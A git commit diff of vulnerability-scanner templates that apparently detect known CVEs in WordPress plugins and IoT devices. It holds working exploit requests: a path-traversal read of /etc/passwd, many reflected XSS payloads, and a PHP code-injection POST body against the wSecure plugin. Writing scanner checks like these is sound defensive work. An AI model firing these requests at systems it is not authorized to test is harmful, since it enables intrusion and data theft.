Added some new template
parent
d75d21afe5
commit
22df30d514
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2009-1558
|
||||
|
||||
info:
|
||||
name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
|
||||
reference: https://www.exploit-db.com/exploits/32954
|
||||
tags: cve,cve2009,iot,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2012-1835
|
||||
|
||||
info:
|
||||
name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835
|
||||
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%22%3E%3Cimg%2Fsrc%3Dx%20onerror%3Dalert%28123%29%3E'
|
||||
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<img/src=x onerror=alert(123)>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?dlsearch=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E'
|
||||
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<ScrIpT>alert(123)</ScrIpT>"
|
||||
- "</sCripT><sCripT>alert(document.domain)</sCripT>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123);</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123);</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%22%3E%3C/textarea%3E%3Cscript%3Ealert%28123%29%3C/script%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
|
||||
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</textarea></script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2016-1000128
|
||||
|
||||
info:
|
||||
name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128
|
||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2016-1000129
|
||||
|
||||
info:
|
||||
name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
|
||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2016-1000130
|
||||
|
||||
info:
|
||||
name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Reflected XSS in wordpress plugin e-search v1.0
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
|
||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2016-1000131
|
||||
|
||||
info:
|
||||
name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
|
||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2016-1000132
|
||||
|
||||
info:
|
||||
name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132
|
||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2016-1000133
|
||||
|
||||
info:
|
||||
name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
|
||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2016-1000134
|
||||
|
||||
info:
|
||||
name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Reflected XSS in wordpress plugin hdw-tube v1.2
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134
|
||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2016-1000135
|
||||
|
||||
info:
|
||||
name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Reflected XSS in wordpress plugin hdw-tube v1.2
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
|
||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,7 +2,7 @@ id: CVE-2016-10956
|
|||
|
||||
info:
|
||||
name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
|
||||
author: daffainfo
|
||||
author: daffainfo,0x240x23elu
|
||||
severity: high
|
||||
description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
|
||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
|
||||
|
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2016-10960
|
||||
|
||||
info:
|
||||
name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
|
||||
reference: |
|
||||
- https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
|
||||
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
|
||||
tags: cve,cve2016,wordpress,wp-plugin,rce
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
|
||||
body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Nuclei: CVE-2016-10960"
|
||||
condition: and
|
||||
part: header
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -13,7 +13,7 @@ info:
|
|||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1"
|
||||
- "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"
|
||||
|
||||
body: "amty_hidden=1"
|
||||
|
||||
|
@ -21,7 +21,7 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -17,7 +17,7 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
|
||||
- "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<img src=x onerror=javascript:prompt(123)>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<img src=x onerror=alert(123)>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2018-12031
|
||||
|
||||
info:
|
||||
name: Eaton Intelligent Power Manager 1.6 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
